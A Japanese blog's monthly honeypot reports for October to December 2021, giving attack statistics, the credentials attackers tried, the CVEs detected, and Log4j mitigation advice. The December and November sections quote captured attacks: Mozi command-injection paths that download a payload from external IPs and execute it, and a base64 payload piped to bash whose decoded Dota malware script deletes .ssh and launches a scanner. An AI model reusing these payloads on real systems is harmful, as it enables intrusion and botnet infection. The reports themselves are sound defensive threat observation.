Midnight Monologues

日々勉強したことを書いてきます

ハニーポット運用(月次報告:2021年12月)

Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起が公開された。

JavaベースのオープンソースのロギングライブラリのApache Log4jには、任意のコード実行の脆弱性(CVE-2021-44228)がある。
Apache Log4jが動作するサーバーにおいて、遠隔の第三者が本脆弱性を悪用する細工したデータを送信することで、任意のコードを実行する可能性がある。

Apache Log4j Security Vulnerabilities
Fixed in Log4j 2.15.0
https://logging.apache.org/log4j/2.x/security.html

※出典:Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起  https://www.jpcert.or.jp/at/2021/at210050.html

www.ipa.go.jp www.jpcert.or.jp logging.apache.org

推奨の対策では以下が紹介されている。

・自身が管理するIT環境でlog4jを利用するシステムとソフトウェアを棚卸する。
(※時間のかかる作業なので、前もって始めた方が良い)

・インターネットに接続されたソフトウェア/デバイスに対し、セキュリティパッチをすぐに適用する。

・社内のソフトウェア/デバイスに対応するセキュリティパッチをできるだけ早く適用する。
※何らかの理由でパッチが適用できない場合は、システムをインターネットから隔離し、以下の緩和策を適用することを強く推奨する。
 Case1. バージョンが2.10 の場合
  - log4j2.formatMsgNoLookups を true に設定する。
 Case2. バージョンが2.0 から 2.10.0 までの場合
  - 以下のコマンドを実行し、log4j から LDAP クラスを完全に削除する。
    zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
  - 一部のJVM バージョンでは、com.sun.jndi.rmi.object.trustURLCodebase および com.sun.jndi.cosnaming.object.trustURLCodebase を false に設定して、脆弱性を軽減させることが可能である。(一部の JVM のバージョンでは、すでにこの設定がデフォルトとなっている。)

Linux/Unixのコマンドを使用して、Webサーバーのログに悪用の試みがあるかどうか(成功したかどうかにかかわらず)を確認する。
  sudo egrep -i -r '\${jndi:(ldap[s]?|rmi|dns):/[^entan]+' /var/log/

・ネットワーク境界のログを確認し、IOC(indicators of compromise)のリストが存在するかどうかを確認する。

SnortまたはSuricataベースの(あるいは互換性のある)ネットワークベースIDSを使用している場合、悪用の試みを検出するためのルールを使用する。

脆弱性のあるシステムがある場合、スキャンは非常に強力であり、脆弱性のあるシステムが迅速に悪用されたと考えられるため、悪用の兆候がないか慎重にチェックする必要がある。

・WAF を使用している場合、log4j 固有のルールを導入する。Cloud Armor、Cloudflare WAF、Signal Sciences WAFなど、多くの商用ソリューションで利用可能である。

f:id:SYN-ACK:20220122120745p:plain ※出典:Zero-Day Exploit Targeting Popular Java Library Log4j
 - https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/

TryHackMeでも動作確認用のMachineが提供されている。
tryhackme.com

log4jは発表当初は恒久対応が確立されておらず、非常に深刻かつゼロデイ攻撃に該当する内容であった。
ゼロデイ攻撃に対する備えについて改めて考えさせられる内容であった。
個人情報保護法の改正(2022年4月より施行)により情報漏洩に対する企業への罰則強化が発表されており、セキュリティ対策費用<情報漏洩時の対応費用が現実味を帯びている。 来年度の予算取りに当たっては各企業様においてもセキュリティ対策予算の増加を検討頂きたい内容であった。(新法では罰金額の桁が違うので)

改正個人情報保護法の一部

対象 罰金額(旧法) 罰金額(新法)
措置命令(42条2項、3項)の違反の罰則 30万円以下 1億円以下
個人情報データベース等の不正流用 50万円以下 1億円以下
報告義務(40条)違反の罰則 30万円以下 50万円以下

T-Potにて1か月運用した結果を記載する。

今月のChangelog

 更新無し。

前提条件

運用日時:2021年12月1日-2021年12月31日
運用期間:31日

結果

①各ハニーポットで検知したAttack件数
  • T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
No ハニーポット 件数 先月比
1 Heralding 961,176 86,886
2 Cowrie 595,514 ▲167,494
3 Honeytrap 566,628 50,052
4 Dionaea 409,308 ▲43,816
5 Rdpy 97,024 12,641
6 Adbhoney 15,306 810
7 Mailoney 14,416 ▲1,139
8 Tanner 4,336 1,248
9 Ciscoasa 2,674 627
10 ConPot 1,730 481
11 CitrixHoneypot 1,577 126
12 ElasticPot 1,072 76
13 Medpot 112 ▲23
  • Result
    • 全体的なアクセス数の減少は継続中。
    • Heraldingへのアクセス数は依然として多い。

②攻撃元の国名と件数(Top 20)
No 攻撃元の国名 件数 先月順位
1 Russia 702,356 1(→)
2 Netherlands 529,039 2(→)
3 United States 421,708 4(↑)
4 China 180,816 3(↓)
5 Ukraine 81,292 7(↑)
6 Denmark 74,584 圏外(↑)
7 India 67,107 9(↑)
8 Vietnam 65,611 8(→)
9 Japan 36,691 13(↑)
10 Hong Kong 30,701 圏外(↑)
11 Sweden 27,433 12(↑)
12 South Korea 25,406 圏外(↑)
13 Taiwan 25,279 19(↑)
14 Brazil 24,708 6(↓)
15 Latvia 23,503 15(→)
16 Indonesia 22,645 14(↓)
17 United Kingdom 17,522 5(↓)
18 Poland 16,694 圏外(↑)
19 Germany 12,739 圏外(↑)
20 Thailand 11,957 圏外(↑)

③検知したCVEの脆弱性と件数
  • Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
No CVE ID Count
1 CVE-2020-11899 1,908,169
2 CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 28
3 CVE-2020-11910 12
  • Result
    • 検知されるCVEの種類も少なくなりつつある。
    • Ripple20関連は相変わらず多い。

④よく攻撃されるユーザ名
  • ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
No ユーザ名 件数
1 root 52,208
2 sa 27,629
3 user 4,872
4 admin 4,009
5 postgres 2,505
6 hadoop 1,708
7 mysql 1,618
8 22 1,351
9 (empty) 1,054
10 !root 686
11 2Wire 671
12 test 454
13 support 415
14 0 351
15 666666 348
16 unknown 345
17 adm 343
18 debug 340
19 blank 339
20 knockknockwhosthere 313
21 www 300
22 nproc 299
23 administrator 267
24 anonymous 255
25 Admin 248
26 user123 235
27 db 233
28 www-data 229
29 ftp 212
30 pi 199
31 wwwroot 193
32 ubuntu 177
33 web 176
34 data 169
35 oracle 150
36 guest 126
37 git 109
38 testuser 105
39 server 102
40 ansible 83
41 ubnt 72
42 minecraft 66
43 zabbix 66
44 ftpuser 54
45 butter 51
46 dev 47
47 odoo 40
48 system 33
49 username 33
50 sh 32
  • Result
    • 特記事項なし

⑤よく攻撃されるパスワード
  • パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
No パスワード 件数
1 admin 30,709
2 (empty) 3,356
3 1 1,810
4 password 1,638
5 blank 1,015
6 123456 937
7 root 909
8 Password 900
9 12345 658
10 12345678 594
11 1234 489
12 user 476
13 0 459
14 00000000 447
15 666666 443
16 ubnt 399
17 support 395
18 master 376
19 alpine 366
20 hi3518 356
21 backup 355
22 unknown 353
23 !ishtar 349
24 synnet 340
25 123 337
26 Passw0rd 317
27 knockknockwhosthere 309
28 test 306
29 nproc 294
30 123456789 206
31 1qaz2wsx 203
32 1q2w3e4r 171
33 !QAZ2wsx 163
34 1234567 150
35 1234567890 150
36 111111 147
37 abc123 147
38 qwerty 142
39 system 136
40 admin123 134
41 123123 114
42 pass 111
43 123qwe 107
44 000000 106
45 postgres 94
46 Admin@123 91
47 x 90
48 iloveyou 88
49 root123 84
50 oracle 82
  • Result
    • 特記事項なし

⑥今月のマスオさんとZmap
  • massscanの観測結果は以下の通り。 f:id:SYN-ACK:20220122120529j:plain

  • Zmapの観測結果は以下の通り。 f:id:SYN-ACK:20220122120549j:plain

  • Result

    • 特記事項は無し。

最後に

  • log4jのような深刻度の高いゼロデイ攻撃は非常に参考になる。関連企業がサプライチェーン攻撃を受けた場合に発注元企業側も管理者責任の問われる範囲が個人情報保護法の改正により広がることを考えると、今回のlog4jの対応を契機に各企業におけるセキュリティ意識の向上につながればと個人的には思った。
  • shファイルとexeファイル関連の問い合わせは以下の通り。
◆shファイルに関するアクセス
/axissbins.sh
/bin.sh
/bin/sh
/bins.sh
/Ciabins.sh
/Hilix.sh
/sh
/telnet.sh
/wget.sh
/Yowai.sh

◆exeファイルに関するアクセス
/exiles.exe
360vz.exe
c.exe
ytnk.exe

◆jsファイルに関するアクセス
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/112[.]248.255.248:34891/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/113[.]116.34.83:56138/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/115[.]48.136.152:33245/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/115[.]56.171.76:51240/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/115[.]63.183.145:40679/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/117[.]213.13.227:45111/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/192[.]168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/2[.]142.129.173:33496/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/203[.]170.98.130:3462/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/39[.]88.85.153:37461/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/61[.]52.61.43:46123/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/61[.]52.73.80:52652/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js

ハニーポット運用(月次報告:2021年11月)

12月はX-masにかけてセキュリティイベントが目白押しになる。

2021 SANS Holiday Hack Challenge & KringleCon www.sans.org

Advent of Cyber 3 (2021) tryhackme.com

後は11月~12月にかけてはAmazonサイバーマンデーが例年開催されていたが今年は実施されなかった。(「Amazonブラックフライデー」の中で実施された模様だ。) www.watch.impress.co.jp

来年はセール期間に併せて試験資格の申し込みを実施できればと思う。

T-Potにて1か月運用した結果を記載する。

今月のChangelog

 更新無し。

前提条件

運用日時:2021年11月1日-2021年11月30日
運用期間:31日

結果

①各ハニーポットで検知したAttack件数
  • T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
No ハニーポット 件数 先月比
1 Heralding 874,290 583,536
2 Cowrie 763,008 ▲120,701
3 Honeytrap 516,576 ▲233,343
4 Dionaea 453,124 33,880
5 Rdpy 84,383 8,235
6 Mailoney 15,555 4,940
7 Adbhoney 14,496 ▲1,293
8 Tanner 3,088 3,005
9 Ciscoasa 2,047 789
10 CitrixHoneypot 1,451 ▲117
11 ConPot 1,249 ▲138
12 ElasticPot 996 ▲1,737
13 Medpot 135 ▲576
  • Result
    • 10月に引き続き全体のアクセス数は低下した。
    • Heraldingの検知数がCowrieを抜いて1位に浮上した。Dionaeaの検知数が低下し、smbの脆弱性を狙う攻撃は下火になっているのかもしれない。

②攻撃元の国名と件数(Top 20)
No 攻撃元の国名 件数 先月順位
1 Russia 737,276 1(→)
2 Netherlands 607,689 2(→)
3 China 261,468 3(→)
4 United States 194,351 4(→)
5 United Kingdom 123,493 圏外(↑)
6 Brazil 106,915 7(↑)
7 Ukraine 74,093 19(↑)
8 Vietnam 68,156 6(↓)
9 India 53,357 5(↓)
10 France 37,557 圏外(↑)
11 Singapore 27,598 17(↑)
12 Sweden 26,310 13(↑)
13 Japan 24,783 11(↓)
14 Indonesia 23,771 9(↓)
15 Latvia 23,028 12(↓)
16 Iran 21,049 圏外(↑)
17 Mexico 19,777 17(→)
18 Republic of Lithuania 18,816 圏外(↑)
19 Taiwan 14,475 10(↓)
20 Venezuela 12,985 圏外(↑)

③検知したCVEの脆弱性と件数
  • Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
No CVE ID Count
1 CVE-2020-11899 1,442,569
2 CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 793
3 CVE-2020-11910 45
4 CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 24
5 CVE-2014-2321 CVE-2014-2321 3
  • Result
    • 特記事項なし

④よく攻撃されるユーザ名
  • ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
No ユーザ名 件数
1 root 101,532
2 sa 28,492
3 admin 4,187
4 user 3,470
5 22 1,341
6 hadoop 1,095
7 (empty) 1,067
8 postgres 832
9 2Wire 677
10 !root 674
11 test 602
12 anonymous 507
13 www 491
14 ftp 489
15 Admin 467
16 db 459
17 administrator 456
18 web 455
19 wwwroot 432
20 user123 415
21 data 414
22 knockknockwhosthere 414
23 www-data 410
24 support 374
25 0 360
26 666666 357
27 debug 339
28 adm 338
29 blank 337
30 unknown 325
31 nproc 267
32 pi 238
33 mos 134
34 oracle 132
35 ubuntu 116
36 guest 100
37 Sato 95
38 mysql 91
39 server 81
40 ftpuser 71
41 git 66
42 ubnt 55
43 sh 47
44 dev 41
45 nginx 41
46 miner 39
47 minecraft 37
48 dell 34
49 nick 34
50 default 32
  • Result
    • 特記事項なし

⑤よく攻撃されるパスワード
  • パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
No パスワード 件数
1 admin 26,789
2 (empty) 3,724
3 1 1,588
4 root 1,419
5 password 1,408
6 123456 1,078
7 blank 1,019
8 12345 766
9 12345678 760
10 123 524
11 666666 511
12 Samantha 491
13 1234 486
14 user 485
15 0 482
16 Password 450
17 knockknockwhosthere 420
18 00000000 408
19 master 389
20 support 380
21 ubnt 376
22 alpine 364
23 hi3518 353
24 backup 341
25 unknown 339
26 !ishtar 337
27 synnet 336
28 111111 323
29 test 296
30 zaq12wsx 264
31 nproc 261
32 1q2w3e4r 251
33 abc123 251
34 musicman 241
35 123456789 231
36 qwerty 225
37 1qaz2wsx 224
38 Passw0rd 212
39 1234567 210
40 000000 207
41 system 194
42 admin123 192
43 1234567890 176
44 123123 171
45 123qwe 170
46 iloveyou 169
47 passw0rd 163
48 Jennifer 161
49 123qwe!@# 158
50 pass 158
  • Result
    • Krane Malware関連のアクセスは多くは無いが今月も観測していた。

⑥今月のマスオさんとZmap
  • masscanの観測結果は以下の通り。 f:id:SYN-ACK:20211225233322j:plain

  • Zmapの観測結果は以下の通り。 f:id:SYN-ACK:20211225233703j:plain

  • Result

    • 特記事項は無し。

最後に

  • ブラックフライデー中のため「サイバー術 プロに学ぶサイバーセキュリティ」を購入した。現在通読中。 book.mynavi.jp

  • 来月で今年も終わり。今年受験予定だったセキュリティ資格は何もすすんでいない。

  • 今月のアクセス。 base64エンコードされたデータアクセス

IPアドレス:221[.]195[.]1[.]201

Payload  :

sleep 15s && cd /var/tmp; echo "IyEvYmluL2Jhc2gKY2QgL3RtcAkKcm0gLXJmIC5zc2gKcm0gLXJmIC5tb3VudGZzCnJtIC1yZiAuWDEzLXVuaXgKcm0gLXJmIC5YMTctdW5peApta2RpciAuWDE3LXVuaXgKY2QgLlgxNy11bml4Cm12IC92YXIvdG1wL2RvdGEudGFyLmd6IGRvdGEudGFyLmd6CnRhciB4ZiBkb3RhLnRhci5negpzbGVlcCAzcyAmJiBjZCAvdG1wLy5YMTctdW5peC8ucnN5bmMvYwpub2h1cCAvdG1wLy5YMTctdW5peC8ucnN5bmMvYy90c20gLXQgMTUwIC1TIDYgLXMgNiAtcCAyMiAtUCAwIC1mIDAgLWsgMSAtbCAxIC1pIDAgL3RtcC91cC50eHQgMTkyLjE2OCA+PiAvZGV2L251bGwgMj4xJgpzbGVlcCA4bSAmJiBub2h1cCAvdG1wLy5YMTctdW5peC8ucnN5bmMvYy90c20gLXQgMTUwIC1TIDYgLXMgNiAtcCAyMiAtUCAwIC1mIDAgLWsgMSAtbCAxIC1pIDAgL3RtcC91cC50eHQgMTcyLjE2ID4+IC9kZXYvbnVsbCAyPjEmCnNsZWVwIDIwbSAmJiBjZCAuLjsgL3RtcC8uWDE3LXVuaXgvLnJzeW5jL2luaXRhbGwgMj4xJgpleGl0IDA=" | base64 --decode | bash

 ↓
文字コード部分をPrintable形式にすると以下になる。
 ↓

#!/bin/bash
cd /tmp 
rm -rf .ssh
rm -rf .mountfs
rm -rf .X13-unix
rm -rf .X17-unix
mkdir .X17-unix
cd .X17-unix
mv /var/tmp/dota.tar.gz dota.tar.gz
tar xf dota.tar.gz
sleep 3s && cd /tmp/.X17-unix/.rsync/c
nohup /tmp/.X17-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1&
sleep 8m && nohup /tmp/.X17-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1&
sleep 20m && cd ..; /tmp/.X17-unix/.rsync/initall 2>1&
exit 0

Dota MalwareというIoT機器をターゲットにしたmalwareのようだ。

blog.edie.io

ハニーポット運用(月次報告:2021年10月)

2021年10月04日にApache HTTP Serverにてパストラバーサル脆弱性(CVE-2021-41773)に対する修正バージョンがリリースされた。
バージョン2.4.49のみが該当する脆弱性であり、2.4.50へのアップデートで解消される見込みであったが、2021年10月8日に2.4.50では別のパストラバーサル脆弱性(CVE-2021-42013)があることが判明し、修正バージョン(2.4.51)がリリースされた。

www.jpcert.or.jp

httpd.apache.org

www.nri-secure.co.jp

※うちのハニーポットにはアクセスを確認できず。割と限定的な攻撃?

脆弱性の影響を受けるのは以下条件に該当する場合になる。

  • ドキュメントルート外のファイルがrequire all deniedパラメータにより制限されていない
  • mod_cgiモジュールが有効化されている。

T-Potにて1か月運用した結果を記載する。

今月のChangelog

 更新無し。

前提条件

運用日時:2021年10月1日-2021年10月31日
運用期間:31日

結果

①各ハニーポットで検知したAttack件数
  • T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
No ハニーポット 件数 先月比
1 Cowrie 883,709 ▲1,844,739
2 Honeytrap 749,919 ▲523,547
3 Dionaea 419,244 ▲362,080
4 Heralding 290,754 ▲335,103
5 Rdpy 76,148 ▲82,493
6 Adbhoney 15,789 ▲15,146
7 Mailoney 10,615 ▲3,724
8 ElasticPot 2,733 ▲5,618
9 CitrixHoneypot 1,568 ▲1,490
10 ConPot 1,387 ▲1,817
11 Ciscoasa 1,258 ▲33,653
12 Medpot 711 ▲121
13 Tanner 83 ▲2,966
  • Result
    • 先月と比較して全体のアクセス数が減少

②攻撃元の国名と件数(Top 20)
No 攻撃元の国名 件数 先月順位
1 Russia 568,461 2(↑)
2 Netherlands 474,562 1(↓)
3 China 394,075 3(→)
4 United States 231,655 4(→)
5 India 75,841 9(↑)
6 Vietnam 71,655 11(↑)
7 Brazil 46,562 13(↑)
8 South Korea 33,219 14(↑)
9 Indonesia 29,821 17(↑)
10 Taiwan 28,075 圏外(↑)
11 Japan 24,998 10(↓)
12 Latvia 24,889 16(↑)
13 Sweden 24,718 19(↑)
14 Germany 24,673 15(↑)
15 Monaco 19,813 圏外(↑)
16 Singapore 19,274 8(↓)
17 Mexico 17,223 圏外(↑)
18 Thailand 15,931 圏外(↑)
19 Ukraine 14,398 圏外(↑)
20 Hong Kong 14,314 圏外(↑)
  • Result
    • アクセス数上位の国に変動は無し。
    • 10位以下のアクセス数について先月では圏外だった国がランクインしていた。全体のアクセス数が減少したことで普段ランクインしない国からのアクセスが目立った印象。

③検知したCVEの脆弱性と件数
  • Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
No CVE ID Count
1 CVE-2020-11899 1,405,632
2 CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 259
3 CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 22
4 CVE-2020-11910 8
5 CVE-2020-8515 CVE-2020-8515 1
  • Result
    • 先月から変更なし

④よく攻撃されるユーザ名
  • ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
No ユーザ名 件数
1 root 82,429
2 admin 5,917
3 hadoop 4,281
4 user 2,719
5 sa 2,717
6 oracle 1,616
7 knockknockwhosthere 1,568
8 mysql 1,568
9 git 1,554
10 huawei 1,508
11 22 1,398
12 postgres 1,239
13 (empty) 956
14 !root 705
15 2Wire 698
16 guest 645
17 support 480
18 nproc 403
19 0 369
20 test 364
21 blank 353
22 666666 352
23 adm 351
24 debug 350
25 unknown 339
26 anonymous 261
27 sh 253
28 www 239
29 pi 236
30 ftp 230
31 Admin 199
32 web 184
33 data 180
34 db 179
35 wwwroot 173
36 administrator 166
37 ubuntu 153
38 ftpuser 121
39 info 85
40 backup 75
41 helpdesk 72
42 manager 72
43 mail 71
44 contact 70
45 microsoft 70
46 office 70
47 scan 70
48 smtp 70
49 spam 70
50 www-data 63
  • Result
    • 特記事項なし

⑤よく攻撃されるパスワード
  • パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
No パスワード 件数
1 admin 19,693
2 (empty) 3,426
3 root 1,771
4 knockknockwhosthere 1,568
5 1 1,255
6 blank 1,045
7 123456 1,017
8 password 919
9 12345 769
10 0 529
11 Password 487
12 user 482
13 1234 473
14 666666 425
15 123 421
16 ubnt 405
17 nproc 403
18 0 401
19 support 393
20 master 390
21 alpine 387
22 !ishtar 362
23 backup 359
24 hi3518 358
25 synnet 350
26 unknown 340
27 1q2w3e4r 319
28 12345678 315
29 test 247
30 Passw0rd 219
31 x 205
32 1qaz2wsx 199
33 admin123 160
34 123456789 152
35 abc123 152
36 iloveyou 135
37 111111 120
38 123123 118
39 1234567890 116
40 1234567 115
41 qwerty 110
42 0 109
43 hadoop 93
44 Nr!_CapiBraksjdlfS@4827fVfg1 88
45 raspberry 87
46 321 86
47 system 86
48 123qwe 85
49 postgres 83
50 test123 82
  • Result
    • Nr!_CapiBraksjdlfS@4827fVfg1(44位)はKrane Malwareのアクセスになる。

cujo.com

アクセスログを抽出した結果は以下の通り。

No username password city_name ip country_name
1 root Nr!_CapiBraksjdlfS@3111fVfg1 - 106[.]244[.]10[.]2 South Korea
2 es Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
3 chia Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
4 hyjx Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
5 azureuser Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
6 git Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
7 tomcat Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
8 web Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
9 cisco Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
10 www Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
11 steam Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
12 rustserver Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
13 hduser Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
14 csgo Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
15 carlos Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
16 pgsql Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
17 ftpadmin Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
18 docker Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
19 ts3server Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
20 ftp Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
21 wpuser Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
22 wordpress Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
23 rudder Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
24 mcserver Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
25 ts3 Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
26 administrator Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
27 admin Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
28 deploy Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
29 root Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
30 hyjx Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
31 es Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
32 test Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
33 root@localhost Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
34 ubuntu Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
35 azureuser Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
36 chia Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
37 ansible Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
38 oracle Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
39 hadoop Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
40 centos Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
41 postgres Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
42 ftpuser Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
43 odoo Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
44 esuser Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
45 vagrant Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
46 guest Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
47 minecraft Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
48 joplin Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
49 cms Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
50 cmsuser Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
51 rust Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
52 user Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
53 jenkins Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
54 mysql Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
55 nagios Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
56 deployer Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
57 chia Nr!_CapiBraksjdlfS@4827fVfg1 Buffalo 199[.]195[.]253[.]199 United States
58 hyjx Nr!_CapiBraksjdlfS@4827fVfg1 Buffalo 199[.]195[.]253[.]199 United States
59 chia Nr!_CapiBraksjdlfS@4827fVfg1 Buffalo 199[.]195[.]254[.]38 United States
60 es Nr!_CapiBraksjdlfS@4827fVfg1 Buffalo 199[.]195[.]254[.]38 United States
61 hyjx Nr!_CapiBraksjdlfS@4827fVfg1 Buffalo 199[.]195[.]254[.]38 United States
62 azureuser Nr!_CapiBraksjdlfS@4827fVfg1 Buffalo 199[.]195[.]254[.]38 United States
63 es Nr!_CapiBraksjdlfS@4827fVfg1 San Jose 205[.]185[.]113[.]224 United States
64 chia Nr!_CapiBraksjdlfS@4827fVfg1 San Jose 205[.]185[.]113[.]224 United States
65 hyjx Nr!_CapiBraksjdlfS@4827fVfg1 San Jose 205[.]185[.]113[.]224 United States
